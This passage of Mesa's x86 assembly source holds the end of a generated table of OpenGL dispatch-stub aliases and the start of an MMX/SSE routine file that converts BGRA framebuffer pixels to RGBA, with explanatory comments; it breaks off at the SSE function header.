GL_STUB_ALIAS(VertexAttrib4Nub, _gloffset_VertexAttrib4NubARB, VertexAttrib4Nub@20, VertexAttrib4NubARB, VertexAttrib4NubARB@20)
GL_STUB_ALIAS(VertexAttrib4Nubv, _gloffset_VertexAttrib4NubvARB, VertexAttrib4Nubv@8, VertexAttrib4NubvARB, VertexAttrib4NubvARB@8)
GL_STUB_ALIAS(VertexAttrib4Nuiv, _gloffset_VertexAttrib4NuivARB, VertexAttrib4Nuiv@8, VertexAttrib4NuivARB, VertexAttrib4NuivARB@8)
GL_STUB_ALIAS(VertexAttrib4Nusv, _gloffset_VertexAttrib4NusvARB, VertexAttrib4Nusv@8, VertexAttrib4NusvARB, VertexAttrib4NusvARB@8)
GL_STUB_ALIAS(VertexAttrib4bv, _gloffset_VertexAttrib4bvARB, VertexAttrib4bv@8, VertexAttrib4bvARB, VertexAttrib4bvARB@8)
GL_STUB_ALIAS(VertexAttrib4d, _gloffset_VertexAttrib4dARB, VertexAttrib4d@36, VertexAttrib4dARB, VertexAttrib4dARB@36)
GL_STUB_ALIAS(VertexAttrib4dv, _gloffset_VertexAttrib4dvARB, VertexAttrib4dv@8, VertexAttrib4dvARB, VertexAttrib4dvARB@8)
GL_STUB_ALIAS(VertexAttrib4f, _gloffset_VertexAttrib4fARB, VertexAttrib4f@20, VertexAttrib4fARB, VertexAttrib4fARB@20)
GL_STUB_ALIAS(VertexAttrib4fv, _gloffset_VertexAttrib4fvARB, VertexAttrib4fv@8, VertexAttrib4fvARB, VertexAttrib4fvARB@8)
GL_STUB_ALIAS(VertexAttrib4iv, _gloffset_VertexAttrib4ivARB, VertexAttrib4iv@8, VertexAttrib4ivARB, VertexAttrib4ivARB@8)
GL_STUB_ALIAS(VertexAttrib4s, _gloffset_VertexAttrib4sARB, VertexAttrib4s@20, VertexAttrib4sARB, VertexAttrib4sARB@20)
GL_STUB_ALIAS(VertexAttrib4sv, _gloffset_VertexAttrib4svARB, VertexAttrib4sv@8, VertexAttrib4svARB, VertexAttrib4svARB@8)
GL_STUB_ALIAS(VertexAttrib4ubv, _gloffset_VertexAttrib4ubvARB, VertexAttrib4ubv@8, VertexAttrib4ubvARB, VertexAttrib4ubvARB@8)
GL_STUB_ALIAS(VertexAttrib4uiv, _gloffset_VertexAttrib4uivARB, VertexAttrib4uiv@8, VertexAttrib4uivARB, VertexAttrib4uivARB@8)
GL_STUB_ALIAS(VertexAttrib4usv, _gloffset_VertexAttrib4usvARB, VertexAttrib4usv@8, VertexAttrib4usvARB, VertexAttrib4usvARB@8)
GL_STUB_ALIAS(VertexAttribPointer, _gloffset_VertexAttribPointerARB, VertexAttribPointer@24, VertexAttribPointerARB, VertexAttribPointerARB@24)
GL_STUB_ALIAS(BindBuffer, _gloffset_BindBufferARB, BindBuffer@8, BindBufferARB, BindBufferARB@8)
GL_STUB_ALIAS(BufferData, _gloffset_BufferDataARB, BufferData@16, BufferDataARB, BufferDataARB@16)
GL_STUB_ALIAS(BufferSubData, _gloffset_BufferSubDataARB, BufferSubData@16, BufferSubDataARB, BufferSubDataARB@16)
GL_STUB_ALIAS(DeleteBuffers, _gloffset_DeleteBuffersARB, DeleteBuffers@8, DeleteBuffersARB, DeleteBuffersARB@8)
GL_STUB_ALIAS(GenBuffers, _gloffset_GenBuffersARB, GenBuffers@8, GenBuffersARB, GenBuffersARB@8)
GL_STUB_ALIAS(GetBufferParameteriv, _gloffset_GetBufferParameterivARB, GetBufferParameteriv@12, GetBufferParameterivARB, GetBufferParameterivARB@12)
GL_STUB_ALIAS(GetBufferPointerv, _gloffset_GetBufferPointervARB, GetBufferPointerv@12, GetBufferPointervARB, GetBufferPointervARB@12)
GL_STUB_ALIAS(GetBufferSubData, _gloffset_GetBufferSubDataARB, GetBufferSubData@16, GetBufferSubDataARB, GetBufferSubDataARB@16)
GL_STUB_ALIAS(IsBuffer, _gloffset_IsBufferARB, IsBuffer@4, IsBufferARB, IsBufferARB@4)
GL_STUB_ALIAS(MapBuffer, _gloffset_MapBufferARB, MapBuffer@8, MapBufferARB, MapBufferARB@8)
GL_STUB_ALIAS(UnmapBuffer, _gloffset_UnmapBufferARB, UnmapBuffer@4, UnmapBufferARB, UnmapBufferARB@4)
GL_STUB_ALIAS(BeginQuery, _gloffset_BeginQueryARB, BeginQuery@8, BeginQueryARB, BeginQueryARB@8)
GL_STUB_ALIAS(DeleteQueries, _gloffset_DeleteQueriesARB, DeleteQueries@8, DeleteQueriesARB, DeleteQueriesARB@8)
GL_STUB_ALIAS(EndQuery, _gloffset_EndQueryARB, EndQuery@4, EndQueryARB, EndQueryARB@4)
GL_STUB_ALIAS(GenQueries, _gloffset_GenQueriesARB, GenQueries@8, GenQueriesARB, GenQueriesARB@8)
GL_STUB_ALIAS(GetQueryObjectiv, _gloffset_GetQueryObjectivARB, GetQueryObjectiv@12, GetQueryObjectivARB, GetQueryObjectivARB@12)
GL_STUB_ALIAS(GetQueryObjectuiv, _gloffset_GetQueryObjectuivARB, GetQueryObjectuiv@12, GetQueryObjectuivARB, GetQueryObjectuivARB@12)
GL_STUB_ALIAS(GetQueryiv, _gloffset_GetQueryivARB, GetQueryiv@12, GetQueryivARB, GetQueryivARB@12)
GL_STUB_ALIAS(IsQuery, _gloffset_IsQueryARB, IsQuery@4, IsQueryARB, IsQueryARB@4)
/* GL 2.0 shader-object names aliased onto ARB_shader_objects stubs,
 * plus DrawBuffers / DrawBuffersATI onto the ARB_draw_buffers stub. */
GL_STUB_ALIAS(CompileShader, _gloffset_CompileShaderARB, CompileShader@4, CompileShaderARB, CompileShaderARB@4)
GL_STUB_ALIAS(GetActiveUniform, _gloffset_GetActiveUniformARB, GetActiveUniform@28, GetActiveUniformARB, GetActiveUniformARB@28)
GL_STUB_ALIAS(GetShaderSource, _gloffset_GetShaderSourceARB, GetShaderSource@16, GetShaderSourceARB, GetShaderSourceARB@16)
GL_STUB_ALIAS(GetUniformLocation, _gloffset_GetUniformLocationARB, GetUniformLocation@8, GetUniformLocationARB, GetUniformLocationARB@8)
GL_STUB_ALIAS(GetUniformfv, _gloffset_GetUniformfvARB, GetUniformfv@12, GetUniformfvARB, GetUniformfvARB@12)
GL_STUB_ALIAS(GetUniformiv, _gloffset_GetUniformivARB, GetUniformiv@12, GetUniformivARB, GetUniformivARB@12)
GL_STUB_ALIAS(LinkProgram, _gloffset_LinkProgramARB, LinkProgram@4, LinkProgramARB, LinkProgramARB@4)
GL_STUB_ALIAS(ShaderSource, _gloffset_ShaderSourceARB, ShaderSource@16, ShaderSourceARB, ShaderSourceARB@16)
GL_STUB_ALIAS(Uniform1f, _gloffset_Uniform1fARB, Uniform1f@8, Uniform1fARB, Uniform1fARB@8)
GL_STUB_ALIAS(Uniform1fv, _gloffset_Uniform1fvARB, Uniform1fv@12, Uniform1fvARB, Uniform1fvARB@12)
GL_STUB_ALIAS(Uniform1i, _gloffset_Uniform1iARB, Uniform1i@8, Uniform1iARB, Uniform1iARB@8)
GL_STUB_ALIAS(Uniform1iv, _gloffset_Uniform1ivARB, Uniform1iv@12, Uniform1ivARB, Uniform1ivARB@12)
GL_STUB_ALIAS(Uniform2f, _gloffset_Uniform2fARB, Uniform2f@12, Uniform2fARB, Uniform2fARB@12)
GL_STUB_ALIAS(Uniform2fv, _gloffset_Uniform2fvARB, Uniform2fv@12, Uniform2fvARB, Uniform2fvARB@12)
GL_STUB_ALIAS(Uniform2i, _gloffset_Uniform2iARB, Uniform2i@12, Uniform2iARB, Uniform2iARB@12)
GL_STUB_ALIAS(Uniform2iv, _gloffset_Uniform2ivARB, Uniform2iv@12, Uniform2ivARB, Uniform2ivARB@12)
GL_STUB_ALIAS(Uniform3f, _gloffset_Uniform3fARB, Uniform3f@16, Uniform3fARB, Uniform3fARB@16)
GL_STUB_ALIAS(Uniform3fv, _gloffset_Uniform3fvARB, Uniform3fv@12, Uniform3fvARB, Uniform3fvARB@12)
GL_STUB_ALIAS(Uniform3i, _gloffset_Uniform3iARB, Uniform3i@16, Uniform3iARB, Uniform3iARB@16)
GL_STUB_ALIAS(Uniform3iv, _gloffset_Uniform3ivARB, Uniform3iv@12, Uniform3ivARB, Uniform3ivARB@12)
GL_STUB_ALIAS(Uniform4f, _gloffset_Uniform4fARB, Uniform4f@20, Uniform4fARB, Uniform4fARB@20)
GL_STUB_ALIAS(Uniform4fv, _gloffset_Uniform4fvARB, Uniform4fv@12, Uniform4fvARB, Uniform4fvARB@12)
GL_STUB_ALIAS(Uniform4i, _gloffset_Uniform4iARB, Uniform4i@20, Uniform4iARB, Uniform4iARB@20)
GL_STUB_ALIAS(Uniform4iv, _gloffset_Uniform4ivARB, Uniform4iv@12, Uniform4ivARB, Uniform4ivARB@12)
GL_STUB_ALIAS(UniformMatrix2fv, _gloffset_UniformMatrix2fvARB, UniformMatrix2fv@16, UniformMatrix2fvARB, UniformMatrix2fvARB@16)
GL_STUB_ALIAS(UniformMatrix3fv, _gloffset_UniformMatrix3fvARB, UniformMatrix3fv@16, UniformMatrix3fvARB, UniformMatrix3fvARB@16)
GL_STUB_ALIAS(UniformMatrix4fv, _gloffset_UniformMatrix4fvARB, UniformMatrix4fv@16, UniformMatrix4fvARB, UniformMatrix4fvARB@16)
GL_STUB_ALIAS(UseProgram, _gloffset_UseProgramObjectARB, UseProgram@4, UseProgramObjectARB, UseProgramObjectARB@4)
GL_STUB_ALIAS(ValidateProgram, _gloffset_ValidateProgramARB, ValidateProgram@4, ValidateProgramARB, ValidateProgramARB@4)
GL_STUB_ALIAS(BindAttribLocation, _gloffset_BindAttribLocationARB, BindAttribLocation@12, BindAttribLocationARB, BindAttribLocationARB@12)
GL_STUB_ALIAS(GetActiveAttrib, _gloffset_GetActiveAttribARB, GetActiveAttrib@28, GetActiveAttribARB, GetActiveAttribARB@28)
GL_STUB_ALIAS(GetAttribLocation, _gloffset_GetAttribLocationARB, GetAttribLocation@8, GetAttribLocationARB, GetAttribLocationARB@8)
GL_STUB_ALIAS(DrawBuffers, _gloffset_DrawBuffersARB, DrawBuffers@8, DrawBuffersARB, DrawBuffersARB@8)
GL_STUB_ALIAS(DrawBuffersATI, _gloffset_DrawBuffersARB, DrawBuffersATI@8, DrawBuffersARB, DrawBuffersARB@8)
/* GL 1.4 core names aliased onto EXT/MESA stubs (point parameters,
 * secondary color, fog coord, multi-draw, blend-func-separate, window
 * position), and ARB_vertex_program names aliased onto NV_vertex_program
 * stubs that share the same dispatch slots. */
GL_STUB_ALIAS(PointParameterf, _gloffset_PointParameterfEXT, PointParameterf@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfARB, _gloffset_PointParameterfEXT, PointParameterfARB@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfSGIS, _gloffset_PointParameterfEXT, PointParameterfSGIS@8, PointParameterfEXT, PointParameterfEXT@8)
GL_STUB_ALIAS(PointParameterfv, _gloffset_PointParameterfvEXT, PointParameterfv@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(PointParameterfvARB, _gloffset_PointParameterfvEXT, PointParameterfvARB@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(PointParameterfvSGIS, _gloffset_PointParameterfvEXT, PointParameterfvSGIS@8, PointParameterfvEXT, PointParameterfvEXT@8)
GL_STUB_ALIAS(SecondaryColor3b, _gloffset_SecondaryColor3bEXT, SecondaryColor3b@12, SecondaryColor3bEXT, SecondaryColor3bEXT@12)
GL_STUB_ALIAS(SecondaryColor3bv, _gloffset_SecondaryColor3bvEXT, SecondaryColor3bv@4, SecondaryColor3bvEXT, SecondaryColor3bvEXT@4)
GL_STUB_ALIAS(SecondaryColor3d, _gloffset_SecondaryColor3dEXT, SecondaryColor3d@24, SecondaryColor3dEXT, SecondaryColor3dEXT@24)
GL_STUB_ALIAS(SecondaryColor3dv, _gloffset_SecondaryColor3dvEXT, SecondaryColor3dv@4, SecondaryColor3dvEXT, SecondaryColor3dvEXT@4)
GL_STUB_ALIAS(SecondaryColor3f, _gloffset_SecondaryColor3fEXT, SecondaryColor3f@12, SecondaryColor3fEXT, SecondaryColor3fEXT@12)
GL_STUB_ALIAS(SecondaryColor3fv, _gloffset_SecondaryColor3fvEXT, SecondaryColor3fv@4, SecondaryColor3fvEXT, SecondaryColor3fvEXT@4)
GL_STUB_ALIAS(SecondaryColor3i, _gloffset_SecondaryColor3iEXT, SecondaryColor3i@12, SecondaryColor3iEXT, SecondaryColor3iEXT@12)
GL_STUB_ALIAS(SecondaryColor3iv, _gloffset_SecondaryColor3ivEXT, SecondaryColor3iv@4, SecondaryColor3ivEXT, SecondaryColor3ivEXT@4)
GL_STUB_ALIAS(SecondaryColor3s, _gloffset_SecondaryColor3sEXT, SecondaryColor3s@12, SecondaryColor3sEXT, SecondaryColor3sEXT@12)
GL_STUB_ALIAS(SecondaryColor3sv, _gloffset_SecondaryColor3svEXT, SecondaryColor3sv@4, SecondaryColor3svEXT, SecondaryColor3svEXT@4)
GL_STUB_ALIAS(SecondaryColor3ub, _gloffset_SecondaryColor3ubEXT, SecondaryColor3ub@12, SecondaryColor3ubEXT, SecondaryColor3ubEXT@12)
GL_STUB_ALIAS(SecondaryColor3ubv, _gloffset_SecondaryColor3ubvEXT, SecondaryColor3ubv@4, SecondaryColor3ubvEXT, SecondaryColor3ubvEXT@4)
GL_STUB_ALIAS(SecondaryColor3ui, _gloffset_SecondaryColor3uiEXT, SecondaryColor3ui@12, SecondaryColor3uiEXT, SecondaryColor3uiEXT@12)
GL_STUB_ALIAS(SecondaryColor3uiv, _gloffset_SecondaryColor3uivEXT, SecondaryColor3uiv@4, SecondaryColor3uivEXT, SecondaryColor3uivEXT@4)
GL_STUB_ALIAS(SecondaryColor3us, _gloffset_SecondaryColor3usEXT, SecondaryColor3us@12, SecondaryColor3usEXT, SecondaryColor3usEXT@12)
GL_STUB_ALIAS(SecondaryColor3usv, _gloffset_SecondaryColor3usvEXT, SecondaryColor3usv@4, SecondaryColor3usvEXT, SecondaryColor3usvEXT@4)
GL_STUB_ALIAS(SecondaryColorPointer, _gloffset_SecondaryColorPointerEXT, SecondaryColorPointer@16, SecondaryColorPointerEXT, SecondaryColorPointerEXT@16)
GL_STUB_ALIAS(MultiDrawArrays, _gloffset_MultiDrawArraysEXT, MultiDrawArrays@16, MultiDrawArraysEXT, MultiDrawArraysEXT@16)
GL_STUB_ALIAS(MultiDrawElements, _gloffset_MultiDrawElementsEXT, MultiDrawElements@20, MultiDrawElementsEXT, MultiDrawElementsEXT@20)
GL_STUB_ALIAS(FogCoordPointer, _gloffset_FogCoordPointerEXT, FogCoordPointer@12, FogCoordPointerEXT, FogCoordPointerEXT@12)
GL_STUB_ALIAS(FogCoordd, _gloffset_FogCoorddEXT, FogCoordd@8, FogCoorddEXT, FogCoorddEXT@8)
GL_STUB_ALIAS(FogCoorddv, _gloffset_FogCoorddvEXT, FogCoorddv@4, FogCoorddvEXT, FogCoorddvEXT@4)
GL_STUB_ALIAS(FogCoordf, _gloffset_FogCoordfEXT, FogCoordf@4, FogCoordfEXT, FogCoordfEXT@4)
GL_STUB_ALIAS(FogCoordfv, _gloffset_FogCoordfvEXT, FogCoordfv@4, FogCoordfvEXT, FogCoordfvEXT@4)
GL_STUB_ALIAS(BlendFuncSeparate, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparate@16, BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB_ALIAS(BlendFuncSeparateINGR, _gloffset_BlendFuncSeparateEXT, BlendFuncSeparateINGR@16, BlendFuncSeparateEXT, BlendFuncSeparateEXT@16)
GL_STUB_ALIAS(WindowPos2d, _gloffset_WindowPos2dMESA, WindowPos2d@16, WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB_ALIAS(WindowPos2dARB, _gloffset_WindowPos2dMESA, WindowPos2dARB@16, WindowPos2dMESA, WindowPos2dMESA@16)
GL_STUB_ALIAS(WindowPos2dv, _gloffset_WindowPos2dvMESA, WindowPos2dv@4, WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB_ALIAS(WindowPos2dvARB, _gloffset_WindowPos2dvMESA, WindowPos2dvARB@4, WindowPos2dvMESA, WindowPos2dvMESA@4)
GL_STUB_ALIAS(WindowPos2f, _gloffset_WindowPos2fMESA, WindowPos2f@8, WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB_ALIAS(WindowPos2fARB, _gloffset_WindowPos2fMESA, WindowPos2fARB@8, WindowPos2fMESA, WindowPos2fMESA@8)
GL_STUB_ALIAS(WindowPos2fv, _gloffset_WindowPos2fvMESA, WindowPos2fv@4, WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB_ALIAS(WindowPos2fvARB, _gloffset_WindowPos2fvMESA, WindowPos2fvARB@4, WindowPos2fvMESA, WindowPos2fvMESA@4)
GL_STUB_ALIAS(WindowPos2i, _gloffset_WindowPos2iMESA, WindowPos2i@8, WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB_ALIAS(WindowPos2iARB, _gloffset_WindowPos2iMESA, WindowPos2iARB@8, WindowPos2iMESA, WindowPos2iMESA@8)
GL_STUB_ALIAS(WindowPos2iv, _gloffset_WindowPos2ivMESA, WindowPos2iv@4, WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB_ALIAS(WindowPos2ivARB, _gloffset_WindowPos2ivMESA, WindowPos2ivARB@4, WindowPos2ivMESA, WindowPos2ivMESA@4)
GL_STUB_ALIAS(WindowPos2s, _gloffset_WindowPos2sMESA, WindowPos2s@8, WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB_ALIAS(WindowPos2sARB, _gloffset_WindowPos2sMESA, WindowPos2sARB@8, WindowPos2sMESA, WindowPos2sMESA@8)
GL_STUB_ALIAS(WindowPos2sv, _gloffset_WindowPos2svMESA, WindowPos2sv@4, WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB_ALIAS(WindowPos2svARB, _gloffset_WindowPos2svMESA, WindowPos2svARB@4, WindowPos2svMESA, WindowPos2svMESA@4)
GL_STUB_ALIAS(WindowPos3d, _gloffset_WindowPos3dMESA, WindowPos3d@24, WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB_ALIAS(WindowPos3dARB, _gloffset_WindowPos3dMESA, WindowPos3dARB@24, WindowPos3dMESA, WindowPos3dMESA@24)
GL_STUB_ALIAS(WindowPos3dv, _gloffset_WindowPos3dvMESA, WindowPos3dv@4, WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB_ALIAS(WindowPos3dvARB, _gloffset_WindowPos3dvMESA, WindowPos3dvARB@4, WindowPos3dvMESA, WindowPos3dvMESA@4)
GL_STUB_ALIAS(WindowPos3f, _gloffset_WindowPos3fMESA, WindowPos3f@12, WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB_ALIAS(WindowPos3fARB, _gloffset_WindowPos3fMESA, WindowPos3fARB@12, WindowPos3fMESA, WindowPos3fMESA@12)
GL_STUB_ALIAS(WindowPos3fv, _gloffset_WindowPos3fvMESA, WindowPos3fv@4, WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB_ALIAS(WindowPos3fvARB, _gloffset_WindowPos3fvMESA, WindowPos3fvARB@4, WindowPos3fvMESA, WindowPos3fvMESA@4)
GL_STUB_ALIAS(WindowPos3i, _gloffset_WindowPos3iMESA, WindowPos3i@12, WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB_ALIAS(WindowPos3iARB, _gloffset_WindowPos3iMESA, WindowPos3iARB@12, WindowPos3iMESA, WindowPos3iMESA@12)
GL_STUB_ALIAS(WindowPos3iv, _gloffset_WindowPos3ivMESA, WindowPos3iv@4, WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB_ALIAS(WindowPos3ivARB, _gloffset_WindowPos3ivMESA, WindowPos3ivARB@4, WindowPos3ivMESA, WindowPos3ivMESA@4)
GL_STUB_ALIAS(WindowPos3s, _gloffset_WindowPos3sMESA, WindowPos3s@12, WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB_ALIAS(WindowPos3sARB, _gloffset_WindowPos3sMESA, WindowPos3sARB@12, WindowPos3sMESA, WindowPos3sMESA@12)
GL_STUB_ALIAS(WindowPos3sv, _gloffset_WindowPos3svMESA, WindowPos3sv@4, WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB_ALIAS(WindowPos3svARB, _gloffset_WindowPos3svMESA, WindowPos3svARB@4, WindowPos3svMESA, WindowPos3svMESA@4)
GL_STUB_ALIAS(BindProgramARB, _gloffset_BindProgramNV, BindProgramARB@8, BindProgramNV, BindProgramNV@8)
GL_STUB_ALIAS(DeleteProgramsARB, _gloffset_DeleteProgramsNV, DeleteProgramsARB@8, DeleteProgramsNV, DeleteProgramsNV@8)
GL_STUB_ALIAS(GenProgramsARB, _gloffset_GenProgramsNV, GenProgramsARB@8, GenProgramsNV, GenProgramsNV@8)
GL_STUB_ALIAS(GetVertexAttribPointerv, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointerv@12, GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB_ALIAS(GetVertexAttribPointervARB, _gloffset_GetVertexAttribPointervNV, GetVertexAttribPointervARB@12, GetVertexAttribPointervNV, GetVertexAttribPointervNV@12)
GL_STUB_ALIAS(IsProgramARB, _gloffset_IsProgramNV, IsProgramARB@4, IsProgramNV, IsProgramNV@4)
GL_STUB_ALIAS(PointParameteri, _gloffset_PointParameteriNV, PointParameteri@8, PointParameteriNV, PointParameteriNV@8)
GL_STUB_ALIAS(PointParameteriv, _gloffset_PointParameterivNV, PointParameteriv@8, PointParameterivNV, PointParameterivNV@8)
/* Marker symbol for the end of the generated dispatch-stub region. */
GLOBL GLNAME(gl_dispatch_functions_end)
HIDDEN(GLNAME(gl_dispatch_functions_end))
ALIGNTEXT16
GLNAME(gl_dispatch_functions_end):
/* For TLS-based dispatch on Linux, emit an ELF .note.ABI-tag so the loader
 * requires a kernel new enough for the TLS model this code assumes. */
#if defined(GLX_USE_TLS) && defined(__linux__)
.section ".note.ABI-tag", "a"
.p2align 2
.long 1f - 0f /* name length */
.long 3f - 2f /* data length */
.long 1 /* note type: NT_GNU_ABI_TAG (not a length) */
0: .asciz "GNU" /* vendor name */
1: .p2align 2
2: .long 0 /* note data word 0: OS = GNU/Linux */
.long 2,4,20 /* Minimum kernel version w/TLS */
3: .p2align 2 /* pad out section */
#endif /* GLX_USE_TLS */
/* Mark the object as not needing an executable stack. */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 13,228
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/read_rgba_span_x86.S
|
/*
* (C) Copyright IBM Corporation 2004
* All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* on the rights to use, copy, modify, merge, publish, distribute, sub
* license, and/or sell copies of the Software, and to permit persons to whom
* the Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL
* IBM AND/OR THEIR SUPPLIERS BE LIABLE FOR ANY CLAIM,
* DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
* OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
* USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/**
* \file read_rgba_span_x86.S
* Optimized routines to transfer pixel data from the framebuffer to a
* buffer in main memory.
*
* \author Ian Romanick <idr@us.ibm.com>
*/
.file "read_rgba_span_x86.S"
#if !defined(__DJGPP__) && !defined(__MINGW32__) /* this one cries for assyntax.h */
/* Kevin F. Quinn 2nd July 2006
* Replaced data segment constants with text-segment instructions.
*/
/*
 * Build the two byte-swizzle masks in registers m1/m2 without using the
 * data segment: each 32-bit constant is pushed four times to form a
 * 16-byte pattern on the stack, loaded with `mvins` (movq for MMX,
 * movdqu for SSE2), and the stack pointer is then restored.
 *   m1 = 0xff00ff00 replicated  (bytes kept in place by the swizzle)
 *   m2 = 0x00ff0000 replicated  (bytes moved by the shift/mask steps)
 * Transiently uses 32 bytes below %esp; clobbers m1, m2 and EFLAGS.
 */
#define LOAD_MASK(mvins,m1,m2) \
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
pushl $0xff00ff00 ;\
mvins (%esp), m1 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
pushl $0x00ff0000 ;\
mvins (%esp), m2 ;\
addl $32, %esp
/* I implemented these as macros because they appear in several places,
* and I've tweaked them a number of times. I got tired of changing every
* place they appear. :)
*/
/*
 * Convert one BGRA8888_REV pixel: load 32 bits from (%ebx), byte-swap
 * ARGB -> ABGR (i.e. R,G,B,A in memory order), store to (%ecx), and
 * advance both pointers by 4.  Clobbers %eax and EFLAGS.
 */
#define DO_ONE_PIXEL() \
movl (%ebx), %eax ; \
addl $4, %ebx ; \
bswap %eax /* ARGB -> BGRA */ ; \
rorl $8, %eax /* BGRA -> ABGR */ ; \
movl %eax, (%ecx) /* ABGR -> R, G, B, A */ ; \
addl $4, %ecx
/*
 * Convert the final BGRA8888_REV pixel: same swizzle as DO_ONE_PIXEL()
 * but neither pointer is advanced afterwards.  Clobbers %eax and EFLAGS.
 *
 * Fix: the previous revision ended with a dangling "; \" line
 * continuation, which spliced whatever source line happened to follow
 * into the macro definition.  The stray continuation is removed.
 */
#define DO_ONE_LAST_PIXEL() \
movl (%ebx), %eax ; \
bswap %eax /* ARGB -> BGRA */ ; \
rorl $8, %eax /* BGRA -> ABGR */ ; \
movl %eax, (%ecx) /* ABGR -> R, G, B, A */
/**
* MMX optimized version of the BGRA8888_REV to RGBA copy routine.
*
* \warning
* This function assumes that the caller will issue the EMMS instruction
* at the correct places.
*/
/*
 * _generic_read_RGBA_span_BGRA8888_REV_MMX(src, dst, count)
 *
 * cdecl, x86-32.  After the "pushl %ebx" below the arguments sit at
 * 8(%esp)=src, 12(%esp)=dst, 16(%esp)=pixel count (the inline comments
 * on the loads confirm this layout).  %mm1/%mm2 hold the swizzle masks
 * built by LOAD_MASK; the main loop converts two pixels per iteration.
 * Clobbers %eax, %ecx, %edx, mm0-mm4, EFLAGS.  Per the note above, the
 * caller must issue EMMS unless USE_INNER_EMMS is defined.
 */
.globl _generic_read_RGBA_span_BGRA8888_REV_MMX
.hidden _generic_read_RGBA_span_BGRA8888_REV_MMX
.type _generic_read_RGBA_span_BGRA8888_REV_MMX, @function
_generic_read_RGBA_span_BGRA8888_REV_MMX:
pushl %ebx
#ifdef USE_INNER_EMMS
emms
#endif
LOAD_MASK(movq,%mm1,%mm2)
movl 8(%esp), %ebx /* source pointer */
movl 16(%esp), %edx /* number of pixels to copy */
movl 12(%esp), %ecx /* destination pointer */
testl %edx, %edx
jle .L20 /* Bail if there's nothing to do. */
/* eax = ((-src) >> 2) & 1: one pixel is converted scalar when the
 * source is 4-byte but not 8-byte aligned, so the movq loads below
 * are 8-byte aligned.
 */
movl %ebx, %eax
negl %eax
sarl $2, %eax
andl $1, %eax
je .L17
subl %eax, %edx
DO_ONE_PIXEL()
.L17:
/* Would it be faster to unroll this loop once and process 4 pixels
* per pass, instead of just two?
*/
movl %edx, %eax
shrl %eax /* eax = number of 2-pixel iterations */
jmp .L18
.L19:
movq (%ebx), %mm0
addl $8, %ebx
/* These 9 instructions do what PSHUFB (if there were such an
* instruction) could do in 1. :(
*/
movq %mm0, %mm3
movq %mm0, %mm4
pand %mm2, %mm3
psllq $16, %mm4
psrlq $16, %mm3
pand %mm2, %mm4
pand %mm1, %mm0
por %mm4, %mm3
por %mm3, %mm0
movq %mm0, (%ecx)
addl $8, %ecx
subl $1, %eax
.L18:
jne .L19
#ifdef USE_INNER_EMMS
emms
#endif
/* At this point there are either 1 or 0 pixels remaining to be
* converted. Convert the last pixel, if needed.
*/
testl $1, %edx
je .L20
DO_ONE_LAST_PIXEL()
.L20:
popl %ebx
ret
.size _generic_read_RGBA_span_BGRA8888_REV_MMX, .-_generic_read_RGBA_span_BGRA8888_REV_MMX
/**
* SSE optimized version of the BGRA8888_REV to RGBA copy routine. SSE
* instructions are only actually used to read data from the framebuffer.
* In practice, the speed-up is pretty small.
*
* \todo
* Do some more testing and determine if there's any reason to have this
* function in addition to the MMX version.
*
* \warning
* This function assumes that the caller will issue the EMMS instruction
* at the correct places.
*/
/*
 * _generic_read_RGBA_span_BGRA8888_REV_SSE(src, dst, count)
 *
 * cdecl, x86-32.  After the three pushes below the arguments sit at
 * 16(%esp)=src, 20(%esp)=dst, 24(%esp)=pixel count.  %ebp preserves the
 * original %esp while a 16-byte-aligned scratch slot is carved out of
 * the stack for the movaps spill that moves data from %xmm0 to MMX
 * registers.  The head code converts 0-3 pixels so the movaps loads
 * read from a 16-byte-aligned source; the main loop converts 4 pixels
 * per iteration; the tail converts the remaining 0-3.
 * Clobbers %eax, %ecx, %edx, mm0-mm7, xmm0, EFLAGS.  Per the note
 * above, the caller must issue EMMS unless USE_INNER_EMMS is defined.
 */
.globl _generic_read_RGBA_span_BGRA8888_REV_SSE
.hidden _generic_read_RGBA_span_BGRA8888_REV_SSE
